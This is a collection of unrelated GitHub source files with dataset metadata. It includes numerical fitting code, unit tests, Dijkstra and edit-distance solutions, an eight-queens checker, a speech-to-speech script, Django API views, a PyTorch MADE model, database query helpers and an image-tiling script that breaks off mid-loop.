sw*np.array([np.ones((n,)),xx,xx**2])\r\n beta, residual,rank,s = np.linalg.lstsq(A.T,zz)\r\n rotijk[count,:]=np.array([rot[i],rot[j],rot[k]])\r\n coef[count,:]=beta\r\n res[count] = residual[0]\r\n count +=1\r\n \r\n ind = np.argmin(res)\r\n c = coef[ind,:]\r\n x0r = -c[1]/2/c[2]\r\n z0r = c[0]-c[1]**2/4/c[2]\r\n \r\n beta =c[2]\r\n a = -rotijk[ind,0]\r\n b = -rotijk[ind,1]\r\n c = -rotijk[ind,2]\r\n center=rotation_3D(np.array([[x0r],[0],[z0r]]),a,b,c).flatten()\r\n x0=center[0]\r\n y0=center[1]\r\n z0=center[2]\r\n B0 = np.array([x0,y0,z0,a,b,c,beta])\r\n return B0\r\n\r\ndef rotation(X,th):\r\n R = np.array([[np.cos(th),-np.sin(th)],[np.sin(th),np.cos(th)]])\r\n Xr = np.dot(R,X)\r\n return Xr\r\ndef rotation_3D(X,a,b,c):\r\n sa = np.sin(a)\r\n ca = np.cos(a)\r\n sb = np.sin(b)\r\n cb = np.cos(b)\r\n sc = np.sin(c)\r\n cc = np.cos(c)\r\n R = np.array([[cb*cc,ca*sc+sa*sb*cc,sa*sc-ca*sb*cc],[-cb*sc,ca*cc-sa*sb*sc,sa*cc+ca*sb*sc],[sb,-sa*cb,ca*cb]])\r\n Xr = np.dot(R,X)\r\n return Xr","repo_name":"wayinone/RRA","sub_path":"EM/fcn_fit.py","file_name":"fcn_fit.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14355399668","text":"from week_two.eight.question_eight import *\nimport unittest\n\n\nclass TestListInLists(unittest.TestCase):\n # Check lists in lists with no duplicate elements nad all of the same data type\n def test_list_in_list_no_duplicate_elements(self):\n first_list = [\"a\", \"b\", \"c\"]\n second_list = [\"d\", \"e\", \"f\", \"g\"]\n third_list = [\"h\", \"i\", \"j\", \"k\", \"l\"]\n self.assertEqual(list_function(first_list, second_list, third_list),\n ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l'])\n","repo_name":"ChristineWasike/data_structures","sub_path":"week_two/eight/unit_test_question_eight.py","file_name":"unit_test_question_eight.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74570103614","text":"class Solution:\n def countPaths(self, n: int, roads: List[List[int]]) -> int:\n\n #CREATE THE GRAPH\n graph = {i: [] for i in range(n)}\n\n for a, b, t in roads:\n graph[a].append((b, t))\n graph[b].append((a, t))\n\n #DJISKTA'S ALGORITHM\n\n #PQ TO HOLD VERTICES AND TIME\n pq = [(0, 0)]\n\n #STORE DISTANCES\n distances = [float('inf') for i in range(n)]\n\n #STORE WAYS TO REACH WITH LOWEST DISTANCE\n ways = [0 for i in range(n)]\n\n #FOR START NODE\n distances[0] = 0\n ways[0] = 1\n\n\n #ITERATE\n while pq:\n time, curr = heapq.heappop(pq)\n\n #IF GREATER\n if time > distances[curr]:\n continue\n\n\n for neigh, t in graph[curr]:\n newTime = time + t\n\n if newTime < distances[neigh]:\n #UPDATE DISTANCE AND WAYS\n distances[neigh] = newTime\n ways[neigh] = ways[curr]\n\n #ADD TO QUEUE\n heapq.heappush(pq, (newTime, neigh))\n\n elif newTime == distances[neigh]:\n ways[neigh] = (ways[neigh] + ways[curr]) % (10**9 + 7)\n\n return ways[n - 1]\n","repo_name":"yashpandey474/Competitive-Coding","sub_path":"LeetCode/Python/Graph/ways_to_reach_destination.py","file_name":"ways_to_reach_destination.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72137915134","text":"# Добавьте в пакет, созданный на семинаре шахматный модуль. Внутри него напишите код, решающий задачу о 8 ферзях.\n# Известно, что на доске 8×8 можно расставить 8 ферзей так, чтобы они не били друг друга.\n# Вам дана расстановка 8 ферзей на доске, определите, есть ли среди них пара бьющих друг друга.\n# Программа получает на вход восемь пар чисел, каждое число от 1 до 8 - координаты 8 ферзей.\n# Если ферзи не бьют друг друга верните истину, а если бьют - ложь.\n\n# Напишите функцию в шахматный модуль.\n# Используйте генератор случайных чисел для случайной расстановки ферзей в задаче выше.\n# Проверяйте различный случайные варианты и выведите 4 успешных расстановки.\n\nimport random\n\nSTART = 1\nFINISH = 8\n\n\ndef check_eight_queens(queens: list[(int, int)]) -> bool:\n if len(queens) != FINISH:\n return f\"Неверный ввод числа ферзей на доске.\"\n x = list(i[0] for i in queens)\n y = list(i[1] for i in queens)\n\n for i in range(len(queens)):\n for j in range(i + 1, len(queens)):\n if x[i] == x[j] or y[i] == y[j] or abs(x[i] - x[j]) == abs(y[i] - y[j]):\n return False\n return True\n\n\ndef _generate_random_queens_coordinates() -> list[(int, int)]:\n coordinates = []\n i = 0\n while i < FINISH:\n x, y = random.randint(START, FINISH), random.randint(START, FINISH)\n if x not in list(i[0] for i in coordinates) and (x, y) not in set(coordinates):\n coordinates.append((x, y))\n i += 1\n return sorted(coordinates)\n\n\ndef show_unique_solutions(combination: int) -> print:\n solutions = []\n count = 0\n while count < combination:\n temp = _generate_random_queens_coordinates()\n if check_eight_queens(temp) and temp not in solutions:\n print(temp)\n solutions.append(temp)\n count += 1\n","repo_name":"rimtimti/python_plus","sub_path":"sem6/eight_queens_chess.py","file_name":"eight_queens_chess.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1267470889","text":"import wave\n\nimport pyaudio\nimport pyttsx3\nimport speech_recognition as sr\n\nr = sr.Recognizer() # adding object for the recognizer\nengine = pyttsx3.init()\np = pyaudio.PyAudio()\n\ndef get_io_devices():\n\tp = pyaudio.PyAudio()\n\tinfo = p.get_host_api_info_by_index(0)\n\tnumdevices = info.get('deviceCount')\n\tinp = []\n\tout = []\n\tfor i in range(0, numdevices):\n\t\tif (p.get_device_info_by_host_api_device_index(0, i).get('maxInputChannels')) > 0:\n\t\t\tinp.append(p.get_device_info_by_host_api_device_index(0, i).get('name'))\n\tfor i in range(0, numdevices):\n\t\tif (p.get_device_info_by_host_api_device_index(0, i).get('maxOutputChannels')) > 0:\n\t\t\tout.append(p.get_device_info_by_host_api_device_index(0, i).get('name'))\n\treturn inp,out\n\nclass sttttts:\n\t\"\"\"\n\tThe class that does speech to text, to text to speech.\n\t\"\"\"\n\tdef __init__(self,input_index,output_index,output_index2):\n\t\tself.mic = sr.Microphone(device_index=input_index)\n\t\tself.output_index = output_index\n\t\tself.output_index2 = output_index2\n\tdef stt(self):\n\n\t\t# speech to text\n\t\twith self.mic as source: # making the system default mic as the input source\n\t\t\tprint(\"Say Anything:\")\n\t\t\taudio = r.listen(source=source) # listening to the input\n\t\t\tprint(f\"Stopped Listenning\")\n\t\t\ttry:\n\t\t\t\ttext = r.recognize_google(audio) # understanding the input\n\t\t\t\tprint(f'you said \"{text}\"')\n\t\t\texcept:\n\t\t\t\tprint(\"lol i didnt know what you said\")\n\t\t\t\treturn\n\t\t\treturn text\n\n\tdef make_stt_file(self,text):\n\t\t# text to speech\n\n\t\tengine.save_to_file(text, 'tts.wav')\n\t\tengine.runAndWait()\n\n\tdef tts(self):\n\t\t# playing to VB-Audio Cable Input\n\n\t\twf = wave.open(\"tts.wav\", 'rb')\n\t\tCHUNK = 182\n\t\toutput1 = p.open(\n\t\t\tformat=p.get_format_from_width(wf.getsampwidth()),\n\t\t\tchannels=wf.getnchannels(),\n\t\t\trate=wf.getframerate(),\n\t\t\toutput=True,\n\t\t\toutput_device_index=self.output_index\n\t\t)\n\t\tdata = wf.readframes(CHUNK)\n\t\tif(self.output_index2 is not None):\n\t\t\toutput2 = p.open(\n\t\t\t\tformat=p.get_format_from_width(wf.getsampwidth()),\n\t\t\t\tchannels=wf.getnchannels(),\n\t\t\t\trate=wf.getframerate(),\n\t\t\t\toutput=True,\n\t\t\t\toutput_device_index=self.output_index2\n\t\t\t)\n\n\t\t\twhile data != b'':\n\t\t\t\toutput1.write(data)\n\t\t\t\toutput2.write(data)\n\t\t\t\tdata = wf.readframes(CHUNK)\n\t\telse:\n\t\t\twhile data != b'':\n\t\t\t\toutput1.write(data)\n\t\t\t\tdata = wf.readframes(CHUNK)\n\ndef main(inp,out,out2 = None):\n\tio = sttttts(inp,out,out2)\n\ttext = io.stt()\n\tif text is None:\n\t\treturn\n\tio.make_stt_file(text)\n\tio.tts()\n\ndef repeat(out,out2):\n\tio = sttttts(0,out,out2)\n\tio.tts()\n\ndef say(out,out2,words):\n\tio = sttttts(0,out,out2)\n\tio.make_stt_file(words)\n\tio.tts()\n\nif __name__ == \"__main__\":\n\tmain(0,4)","repo_name":"sttttts/sttttts","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"26028130192","text":"import textdistance\nfrom datetime import datetime\nfrom pymongo import MongoClient\nimport config\nimport re\nfrom unidecode import unidecode\n\nclient = MongoClient(\"localhost\", 27017)\ndb = client.market_database\nlist_of_matches = []\n\nserch_index_collection = db[\"product_catalog\"]\nserch_index_doc_list = serch_index_collection.find()\n\n\ndef get_tests_lists():\n pipoca_list = []\n leite_list = []\n veja_list = []\n detergente_list = []\n arroz_list = []\n\n for doc in serch_index_doc_list:\n if \"leite\" in doc[\"name\"]:\n leite_list.append(doc)\n if \"pipoca\" in doc[\"name\"]:\n pipoca_list.append(doc)\n if \"veja\" in doc[\"name\"]:\n veja_list.append(doc)\n if \"detergente\" in doc[\"name\"]:\n detergente_list.append(doc)\n if \"arroz\" in doc[\"name\"]:\n arroz_list.append(doc)\n\n return [pipoca_list, leite_list, veja_list, detergente_list, arroz_list]\n\n\ndef get_docs_with_popular_products(history_object_doc):\n leite_list_history = []\n amaciante_list_history = []\n cafe_list_history = []\n maionese_list_history = []\n\n for i in history_object_doc:\n if \"leite\" in i[\"name\"]:\n leite_list_history.append(i)\n if \"amaciante\" in i[\"name\"]:\n amaciante_list_history.append(i)\n if \"cafe\" in i[\"name\"]:\n cafe_list_history.append(i)\n if \"maionese\" in i[\"name\"]:\n maionese_list_history.append(i)\n\n return [leite_list_history, amaciante_list_history, cafe_list_history, maionese_list_history]\n\n\ndef test_products():\n products = [\n {\n \"id\": \"62b1231e72ab3382a5958b7b\",\n \"name\": \"amaciante de roupas concentrado downy naturals coco e menta 450ml\"\n },\n {\n \"id\": '62b1231e72ab3382a5958383',\n \"name\": 'leite tirol integral 1 litro'\n },\n {\n \"id\": '62b1231e72ab3382a595895e',\n \"name\": 'maionese hemmer tradicional 930g'\n },\n {\n \"id\": '62b1231e72ab3382a5958b52',\n \"name\": 'amaciante para roupas concentrado downy brisa de verao 1,5 litro'\n },\n {\n \"id\": '62b1231e72ab3382a5958386',\n \"name\": 'cafe melitta tradicional vacuo 500g'\n },\n\n ]\n\n return products","repo_name":"dc-diogo/product_integrator","sub_path":"app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9955425757","text":"# Minion game\n\nword = 'BANANA'\n\nvowel = ['A', 'E', 'I', 'O', 'U']\n\nnum_vowel = 0\nvowel_list = []\nconsonant_list = []\n\nfor item in word:\n vowel_found = False\n for idx, vow in enumerate(vowel):\n if item == vow:\n num_vowel += 1\n vowel_list.append(item)\n vowel_found = True\n break\n if not(vowel_found):\n consonant_list.append(item)\n\n\nprint(vowel_list, consonant_list)\nprint(num_vowel)\n\nvowel_set = sorted(set(vowel_list))\nconsonant_set = sorted(set(consonant_list))\nprint(vowel_set, consonant_set)\n\nprint(vowel_list.count('A'))","repo_name":"ameetmund/python","sub_path":"dev_20210828.py","file_name":"dev_20210828.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"37506771685","text":"\"\"\"empty message\n\nRevision ID: 71f85978d86a\nRevises: ae76d1bd8ee0\nCreate Date: 2022-12-11 11:32:57.506549\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '71f85978d86a'\ndown_revision = 'ae76d1bd8ee0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('chats',\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('recent_snap', sa.String(length=50), nullable=True),\n sa.Column('top3_snappers', sa.String(length=100), nullable=True),\n sa.Column('most_received', sa.Text(), nullable=True),\n sa.Column('total_snaps_sent', sa.Integer(), nullable=True),\n sa.Column('total_snaps_received', sa.Integer(), nullable=True),\n sa.Column('total_snaps_saved', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('user_id')\n )\n with op.batch_alter_table('users', schema=None) as batch_op:\n batch_op.drop_column('recent_snap')\n batch_op.drop_column('total_snaps_sent')\n batch_op.drop_column('total_snaps_saved')\n batch_op.drop_column('most_received')\n batch_op.drop_column('top3_snappers')\n batch_op.drop_column('total_snaps_received')\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('users', schema=None) as batch_op:\n batch_op.add_column(sa.Column('total_snaps_received', sa.INTEGER(), nullable=True))\n batch_op.add_column(sa.Column('top3_snappers', sa.VARCHAR(length=50), nullable=True))\n batch_op.add_column(sa.Column('most_received', sa.TEXT(), nullable=True))\n batch_op.add_column(sa.Column('total_snaps_saved', sa.INTEGER(), nullable=True))\n batch_op.add_column(sa.Column('total_snaps_sent', sa.INTEGER(), nullable=True))\n batch_op.add_column(sa.Column('recent_snap', sa.VARCHAR(length=50), nullable=True))\n\n op.drop_table('chats')\n # ### end Alembic commands ###\n","repo_name":"griffinlaszlo/snata","sub_path":"migrations/versions/71f85978d86a_.py","file_name":"71f85978d86a_.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36106244620","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nclass Made(nn.Module):\n def __init__(self, input_h = 28, input_w = 28, hidden_size = 1000, layer_size = 2, random_order = False, mask_num = 1):\n super(Made, self).__init__()\n self.input_h = input_h\n self.input_w = input_w\n self.hidden_size = hidden_size\n self.layer_size = layer_size\n self.random_order = random_order\n self.mask_num = mask_num\n self.order = {}\n if self.random_order:\n for i in range(self.mask_num):\n self.order[i] = torch.randperm(self.input_h * self.input_w)\n else:\n self.order[0] = torch.Tensor([i for i in range(self.input_h * self.input_w)])\n\n self.layer_num = [self.input_h * self.input_w]\n for j in range(self.layer_size):\n self.layer_num.append(self.hidden_size)\n self.layer_num.append(self.input_h * self.input_w)\n self.net = []\n for n1, n2 in zip(self.layer_num, self.layer_num[1:]):\n self.net.append(MadeLayer(n1, n2))\n self.net.append(nn.ReLU())\n self.net = nn.ModuleList(self.net[:-1])\n self.net = nn.Sequential(*self.net)\n self.update_mask()\n self.weight = nn.Parameter(torch.Tensor(self.input_h * self.input_w, self.input_h * self.input_w).normal_())\n self.register_buffer('maska', torch.tril(torch.ones(self.input_h * self.input_w, self.input_h * self.input_w), -1))\n def update_mask(self):\n m = {}\n if self.random_order:\n m[0] = self.order[torch.randint(0, self.mask_num, (1,)).item()]\n else:\n m[0] = self.order[0]\n for l in range(1, self.layer_size +1):\n m[l] = torch.randint(m[l-1].min().int().item(), self.input_h * self.input_w - 1, size = (self.hidden_size,))\n self.mask = [m[l-1][:, None].long() <= m[l][None, :].long() for l in range(1, self.layer_size + 1)]\n self.mask.append(m[self.layer_size][:, None].long() < m[0][None, :].long())\n layers = [l for l in self.net.modules() if isinstance(l, MadeLayer)]\n for l, m in zip(layers, self.mask):\n l.set_mask(m)\n\n def forward(self, x):\n out = self.net(x)\n a = F.linear(x.view(-1, self.input_h * self.input_w), self.weight * self.maska)\n x = F.sigmoid(out + a)\n x = x.view(-1, 1, self.input_h, self.input_w)\n return x\n\nclass MadeLayer(nn.Module):\n def __init__(self, input_l, output_l):\n super(MadeLayer, self).__init__()\n self.input_l = input_l\n self.output_l = output_l\n self.weight = nn.Parameter(torch.Tensor(output_l, input_l).normal_())\n self.bias = nn.Parameter(torch.Tensor(output_l).normal_())\n self.register_buffer('mask', torch.ones(output_l, input_l))\n def set_mask(self, mask):\n self.mask.data.copy_(mask.float().t())\n\n def forward(self, x):\n x = x.view(-1, self.input_l)\n x = F.linear(x, self.mask * self.weight, self.bias)\n return x\n","repo_name":"Lyusungwon/generative_models_pytorch","sub_path":"made/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"79"} +{"seq_id":"15706360782","text":"import cv2\nimport numpy as np\nfrom mtcnn.mtcnn import MTCNN\n\nINPUT_IMAGE = 'ziyu.jpg'\nOUTPUT_IMAGE = 'output.png'\ndetector = MTCNN(steps_threshold=[0.0, 0.0, 0.0])\n\ndef landmarks(img):\n faces = detector.detect_faces(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n face = max(faces, key=lambda x: x['confidence'])\n return face['keypoints']\n\ndef affineMatrix(lmks, scale=2.5):\n nose = np.array(lmks['nose'], dtype=np.float32)\n left_eye = np.array(lmks['left_eye'], dtype=np.float32)\n right_eye = np.array(lmks['right_eye'], dtype=np.float32)\n eye_width = right_eye - left_eye\n angle = np.arctan2(eye_width[1], eye_width[0])\n center = nose\n alpha = np.cos(angle)\n beta = np.sin(angle)\n w = np.sqrt(np.sum(eye_width**2)) * scale\n m = [[alpha, beta, -alpha * center[0] - beta * center[1] + w * 0.5],\n [-beta, alpha, beta * center[0] - alpha * center[1] + w * 0.5]]\n return np.array(m), (int(w), int(w))\n\nif __name__ == '__main__':\n img = cv2.imread(INPUT_IMAGE)\n mat, size = affineMatrix(landmarks(img))\n cv2.imwrite(OUTPUT_IMAGE, cv2.warpAffine(img, mat, size))\n","repo_name":"YangRice/mtcnn_face_alignment","sub_path":"face_alignment.py","file_name":"face_alignment.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"38498380914","text":"import sys\ninput = sys.stdin.readline\n\nG = int(input())\nP = int(input())\n\ngates = [False] * G\ncnt = 0\nfor _ in range(P):\n num = int(input())\n\n exist = False\n for i in range(num-1 , -1, -1):\n if not gates[i]:\n gates[i] = True\n exist = True\n cnt += 1\n break\n\n if not exist:\n break\n\nprint(cnt)","repo_name":"SangjinH/algorithm","sub_path":"baekjoon/greedy/10775_ori.py","file_name":"10775_ori.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"39481083814","text":"from django.http import HttpResponse\n\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom APIs.serializers import ProjectSerializer, ProfileSerializer\nfrom project.models import Project, Tag\nfrom users.models import Profile\n\n\ndef getRoutes(request):\n return HttpResponse(\"Hello world\")\n\n\n@api_view(['GET', 'POST'])\ndef projects(request):\n projectsObjs = Project.objects.all()\n serializer = ProjectSerializer(projectsObjs, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET', 'POST'])\ndef project(request, projectId):\n projectsObj = Project.objects.get(id=projectId)\n serializer = ProjectSerializer(projectsObj, many=False)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef users(request):\n profiles = Profile.objects.all()\n serializer = ProfileSerializer(profiles, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET', 'POST', 'PUT'])\n@permission_classes([IsAuthenticated])\ndef voteProject(request, pk):\n projectObj = Project.objects.get(id=pk)\n\n review, created = projectObj.review_set.get_or_create(\n owner=request.user.profile)\n review.value = request.data.get('vote')\n review.save()\n projectObj.getVoteCount\n\n return Response({'result': \"you have {vote}voted the {project} project successfully\".format(vote=request.data.get('vote'), project=projectObj)})\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef createTag(request):\n tagObj = Tag.objects.create(name=request.data.get('tagName'))\n tagObj.save()\n return Response({'result': \"{tagObj} created successfully\".format(tagObj=tagObj)})\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef createProject(request):\n\n return Response(\"Hello world\")\n","repo_name":"vinayKumarReddy-mangalampenta/pythonProject","sub_path":"APIs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23660733661","text":"from Querys.query import Query\nimport Resources.UsuarioSubtema.querys_constants as qc\nimport Utils.messages_constants as mc\nfrom pymysql import Error\n\n\nclass UsuarioSubtemaQuery(Query):\n\n def update_porcentage(self, usuario_subtema):\n count = None\n id_tema = None\n id_asignatura = None\n try:\n with self.get_cursor() as cursor:\n exist = self.insert_usuario_subtema(cursor, usuario_subtema)\n if not exist:\n count = self.get_count(\n cursor, tipo=\"subtema\", id=usuario_subtema[1])\n id_tema = count[\"id\"]\n total_subtema = count[\"numero\"]\n porcentaje = self.set_porcentaje_tema(\n cursor, id_tema=id_tema, id_usuario=usuario_subtema[0], total=total_subtema)\n count = self.get_count(cursor, tipo=\"tema\", id=id_tema)\n id_asignatura = count[\"id\"]\n total_tema = count[\"numero\"]\n self.set_porcentaje_asignatura(\n cursor, id_asignatura=id_asignatura, id_usuario=usuario_subtema[0], total=total_tema, porcentaje=porcentaje)\n self.get_connection().commit()\n return {'mensaje': mc.PORCENTAJE_UPDATED}, 201\n else:\n return {'mensaje': mc.OK}, 200\n except Error as e:\n print(\"Error %d: %s\" % (e.args[0], e.args[1]))\n self.get_connection().rollback()\n return {'error': mc.DB_ERROR}, 500\n finally:\n cursor.close()\n\n def insert_usuario_subtema(self, cursor, usuario_subtema):\n count = self.exists(\n cursor, tipo=\"subtema\", id=usuario_subtema[1], id_usuario=usuario_subtema[0])\n if count[\"numero\"] is 0:\n query = self.get_insert_query(\n qc.USUARIO_SUBTEMA_COLUMNS, qc.USUARIO_SUBTEMA_TABLE)\n cursor.execute(query, usuario_subtema)\n return False\n else:\n return True\n\n def exists(self, cursor, **kwargs):\n if kwargs[\"tipo\"] is \"subtema\":\n cursor.execute(qc.USUARIO_SUBTEMA_EXIST, [\n kwargs[\"id\"], kwargs[\"id_usuario\"]])\n elif kwargs[\"tipo\"] is \"tema\":\n cursor.execute(qc.USUARIO_TEMA_EXIST, [\n kwargs[\"id\"], kwargs[\"id_usuario\"]])\n else:\n cursor.execute(qc.USUARIO_ASIGNATURA_EXIST, [\n kwargs[\"id\"], kwargs[\"id_usuario\"]])\n return cursor.fetchall()[0]\n\n def get_count(self, cursor, **kwargs):\n if \"id_usuario\" not in kwargs:\n if kwargs[\"tipo\"] is \"subtema\":\n cursor.execute(qc.SUBTEMA_COUNT, [kwargs[\"id\"]])\n else:\n cursor.execute(qc.TEMA_COUNT, [kwargs[\"id\"]])\n else:\n if kwargs[\"tipo\"] is \"subtema\":\n cursor.execute(qc.USUARIO_SUBTEMA_COUNT, [\n kwargs[\"id\"], kwargs[\"id_usuario\"]])\n else:\n cursor.execute(qc.USUARIO_TEMA_COUNT, [\n kwargs[\"id\"], kwargs[\"id_usuario\"]])\n return cursor.fetchall()[0]\n\n def set_porcentaje_tema(self, cursor, **kwargs):\n count = self.exists(\n cursor, tipo=\"tema\", id=kwargs[\"id_tema\"], id_usuario=kwargs[\"id_usuario\"])\n if count[\"numero\"] is 0:\n porcentaje = (1 / kwargs[\"total\"]) * 100\n query = self.get_insert_query(\n qc.USUARIO_TEMA_COLUMNS, qc.USUARIO_TEMA_TABLE)\n cursor.execute(\n query, [kwargs[\"id_usuario\"], kwargs[\"id_tema\"], int(porcentaje)])\n return porcentaje\n else:\n count = self.get_count(\n cursor, tipo=\"subtema\", id=kwargs[\"id_tema\"], id_usuario=kwargs[\"id_usuario\"])\n porcentaje = (count[\"numero\"] / kwargs[\"total\"]) * 100\n query = self.get_update_query(\n qc.PORCENTAJE_COLUMN, qc.USUARIO_TEMA_TABLE, qc.USUARIO_TEMA_WHERE_COLUMN)\n cursor.execute(\n query, [int(porcentaje), kwargs[\"id_usuario\"], kwargs[\"id_tema\"]])\n return porcentaje\n\n def set_porcentaje_asignatura(self, cursor, **kwargs):\n count = self.exists(\n cursor, tipo=\"asignatura\", id=kwargs[\"id_asignatura\"], id_usuario=kwargs[\"id_usuario\"])\n if count[\"numero\"] is 0:\n porcentaje = (1 / kwargs[\"total\"]) * 100\n query = self.get_insert_query(\n qc.USUARIO_ASIGNATURA_COLUMNS, qc.USUARIO_ASIGNATURA_TABLE)\n cursor.execute(\n query, [kwargs[\"id_usuario\"], kwargs[\"id_asignatura\"], int(porcentaje)])\n elif count[\"numero\"] is not 0 and kwargs[\"porcentaje\"] == 100.0:\n count = self.get_count(\n cursor, tipo=\"tema\", id=kwargs[\"id_asignatura\"], id_usuario=kwargs[\"id_usuario\"])\n porcentaje = (count[\"numero\"] / kwargs[\"total\"]) * 100\n query = self.get_update_query(\n qc.PORCENTAJE_COLUMN, qc.USUARIO_ASIGNATURA_TABLE, qc.USUARIO_ASIGNATURA_WHERE_COLUMN)\n cursor.execute(\n query, [int(porcentaje), kwargs[\"id_usuario\"], kwargs[\"id_asignatura\"]])\n","repo_name":"grupo-2-diseno-web/flask-cachimbogo","sub_path":"Resources/UsuarioSubtema/usuario_subtema_query.py","file_name":"usuario_subtema_query.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11273299794","text":"\"\"\"\nGiven two strings. Using operations delete, insert, replace change second string to be equal to the first string\ntable\ntble\n\n\n\"\"\"\n\n\n# top-down approach\ndef num_of_operations(s1: str, s2: str, ind1: int, ind2: int, meta: dict = None) -> int:\n if meta is None:\n meta = {}\n if ind1 == len(s1):\n return len(s2) - ind2\n if ind2 == len(s2):\n return len(s1) - ind1\n if s1[ind1] == s2[ind2]:\n return num_of_operations(s1, s2, ind1 + 1, ind2 + 1, meta)\n\n meta_key = str(ind1) + str(ind2)\n if meta_key not in meta.keys():\n del_char = num_of_operations(s1, s2, ind1, ind2 + 1, meta)\n add_char = num_of_operations(s1, s2, ind1 + 1, ind2, meta)\n rep_char = num_of_operations(s1, s2, ind1 + 1, ind2 + 1, meta)\n meta[meta_key] = 1 + min(del_char, add_char, rep_char)\n\n return meta[meta_key]\n\n\n# bottom-up approach\ndef findMinOperationBU(s1, s2, tempDict):\n for i1 in range(len(s1) + 1):\n dictKey = str(i1) + '0'\n tempDict[dictKey] = i1\n for i2 in range(len(s2) + 1):\n dictKey = '0' + str(i2)\n tempDict[dictKey] = i2\n\n for i1 in range(1, len(s1) + 1):\n for i2 in range(1, len(s2) + 1):\n if s1[i1 - 1] == s2[i2 - 1]:\n dictKey = str(i1) + str(i2)\n dictKey1 = str(i1 - 1) + str(i2 - 1)\n tempDict[dictKey] = tempDict[dictKey1]\n else:\n dictKey = str(i1) + str(i2)\n dictKeyD = str(i1 - 1) + str(i2)\n dictKeyI = str(i1) + str(i2 - 1)\n dictKeyR = str(i1 - 1) + str(i2 - 1)\n tempDict[dictKey] = 1 + min(tempDict[dictKeyD], min(tempDict[dictKeyI], tempDict[dictKeyR]))\n dictKey = str(len(s1)) + str(len(s2))\n return tempDict[dictKey]\n\n\n# unfinished\ndef convert(s1: str, s2: str):\n meta = {}\n i = 0\n j = 0\n\n meta_key = str(i) + str(j)\n if s1[i] == s2[j]:\n meta[meta_key] = 0\n else:\n\n if meta_key not in meta.keys():\n add_key = str(i) + str(j - 1)\n del_key = str(i - 1) + str(j)\n rep_key = str(i - 1) + str(j - 1)\n meta[meta_key] = 1 + min(meta[del_key], meta[add_key], meta[rep_key])\n\n\nstr1 = \"table\"\nstr2 = \"tblred\"\nprint(num_of_operations(str1, str2, 0, 0))\nmeta = {}\nfindMinOperationBU(str1, str2, meta)\nprint(meta)\n","repo_name":"varvara-vlasyuk/AlgorithmsAndDataStructures","sub_path":"dynamic_programming/convert_string.py","file_name":"convert_string.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17536962197","text":"'''\nAuthor: Mohammed Rashid Chowdhury\nemail: \nScript name: another_slicer.py\n'''\n\n# I implemented the slicing functionality from scratch because the library that i was using in slicer.py (image_slicer) doesn't work as expected.\n\nimport os\nfrom PIL import Image,ImageFile\nimport numpy as np\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\noutput_directory = \"/u1/rashid/Data/predictive_flower_counter/splited_images\"\ninput_directory = \"/discus/\"\n\n# This function slices a given image into user given number of tiles.\ndef make_Tiles(img_path,number_of_tiles_tuple,directory):\n img = Image.open(img_path)\n # print(img.size)\n\n # Assuming each input image which will be fed to Alexnet has an dimension of 224*224\n input_image_size = (224, 224)\n\n # Getting image name\n # if(hasattr(img,'filename')):\n # print(img.filename)\n # save_as = 'cropped_'+img.filename+'.jpg'\n\n # Check if the given directory exists, if not create new directory.\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n # Get the size of the image\n width, height = img.size\n\n # the outer for loop will iterate over the height.\n for i in 